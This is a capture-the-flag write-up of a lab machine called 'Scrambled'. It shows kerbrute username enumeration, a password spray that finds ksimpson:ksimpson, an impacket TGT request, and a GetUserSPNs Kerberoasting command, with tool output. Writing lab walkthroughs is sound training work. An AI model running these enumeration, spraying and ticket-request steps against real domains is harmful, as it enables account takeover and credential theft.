Scrambled
MediumMachineMar 13, 2026
#nmap#kerberos#kerbrute#getTGT#impacket#GetUserSPNs#impact
Scrambled
Domain: scrm.local
nmap
80 Http

Maybe we can find a user who hasn't reset their password yet
Username

Internal app

88
kerberos kerbrute
Finding usernames
./kerbrute_linux_amd64 userenum --dc dc1.scrm.local -d scrm.local /usr/share/seclists/Usernames/xato-net-10-million-usernames-dup.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (9cfb81e) - 08/25/22 - Ronnie Flathers @ropnop
2022/08/25 06:27:47 > Using KDC(s):
2022/08/25 06:27:47 > dc1.scrm.local:88
2022/08/25 06:27:57 > [+] VALID USERNAME: administrator@scrm.local
2022/08/25 06:28:25 > [+] VALID USERNAME: asmith@scrm.local
2022/08/25 06:29:04 > [+] VALID USERNAME: Administrator@scrm.local
2022/08/25 06:29:34 > [+] VALID USERNAME: jhall@scrm.local
2022/08/25 06:33:17 > [+] VALID USERNAME: sjenkins@scrm.local
2022/08/25 06:33:46 > [+] VALID USERNAME: khicks@scrm.local
2022/08/25 06:38:19 > [+] VALID USERNAME: Asmith@scrm.local
This wasn't helpful in the long run but gave me a list of users to work with, along with the ksimpson name from earlier
Let's password spray them each with their own username, and we see that we get a valid match for ksimpson:ksimpson
./kerbrute_linux_amd64 passwordspray -d scrm.local --dc dc1.scrm.local ../../../scrambled/users.txt ksimpson
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (9cfb81e) - 08/25/22 - Ronnie Flathers @ropnop
2022/08/25 06:44:56 > Using KDC(s):
2022/08/25 06:44:56 > dc1.scrm.local:88
2022/08/25 06:44:56 > [+] VALID LOGIN: ksimpson@scrm.local:ksimpson
2022/08/25 06:44:56 > Done! Tested 8 logins (1 successes) in 0.292 seconds
135 RPC
139/445 Netbios/smb
389 LDAP Domain: scrm.local
464 kpasswd
593 RPC over HTTP
636 LDAP
Foothold
getTGT impacket
Found working username:password of ksimpson:ksimpson
lets get a ticket
┌[blackBox]─[06:48-25/08]─[/home/parsec/htb/tools/kerbrute/dist]
└╼parsec$getTGT.py scrm.local/ksimpson:ksimpson -dc-ip scrm.local
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Saving ticket in ksimpson.ccache
Let's export that so the impacket tools can utilize it
export KRB5CCNAME=ksimpson.ccache
Now we should be able to authenticate properly with this TGT.
Let's try to search for Service Accounts/SPN for some keys
GetUserSPNs impact
GetUserSPNs.py -request scrm.local/ksimpson -k -no-pass -dc-ip dc1.scrm.local